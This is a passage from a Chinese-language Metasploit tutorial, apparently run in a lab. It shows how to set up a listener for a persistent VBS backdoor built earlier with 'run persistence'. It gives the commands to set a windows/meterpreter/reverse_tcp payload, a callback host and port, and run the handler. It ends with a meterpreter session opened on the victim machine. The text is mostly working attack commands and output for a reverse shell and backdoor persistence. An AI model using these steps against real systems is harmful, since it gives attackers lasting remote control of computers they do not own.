进到这个监听模块之后,先查看该模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数?
>show options
**结果:**其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;
重点关注3个参数配置,需要设置哪个就设置哪个:
15、设置攻击载体、回连地址以及端口号Payload:攻击载体;
LHOST:回连地址;
LPORT:回连端口号;
因为我们要开启的这个监听模块,是专门针对于yqLAOjt.vbs后门程序,进行实时监听,那么,必然需要将监听模块的参数配置,与yqLAOjt.vbs后门程序的参数配置保持一致,只有这样,才能达到准确的监听
之前制作yqLAOjt.vbs的参数为:
"run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21"
因此,我们也就需要将监听模块的攻击载体Payload,与后门程序的payload保持一致:
>set payload windows/meterpreter/reverse_tcp
需要将监听模块的回连地址LHOST,与后门程序的LHOST保持一致:
>set LHOST 192.168.10.21
需要将监听模块的回连地址的端口号LPORT,与后门程序的LPORT保持一致:
>set LPORT 40000
>show options
>run
**结果:**开启针对192.168.10.21:40000的监听模式,因为yqLAOjt.vbs后门程序已经设置了自动加载,所以一旦开启监听模块,立即会有反馈信息回连到192.168.10.21:40000上来。
最终,“meterpreter session 2 opened”--表明已经开通192.168.10.21:40000和192.168.10.45:49227的会话连接2。
一般会自动进入控制通道meterpreter,交互模式,表明攻击成功。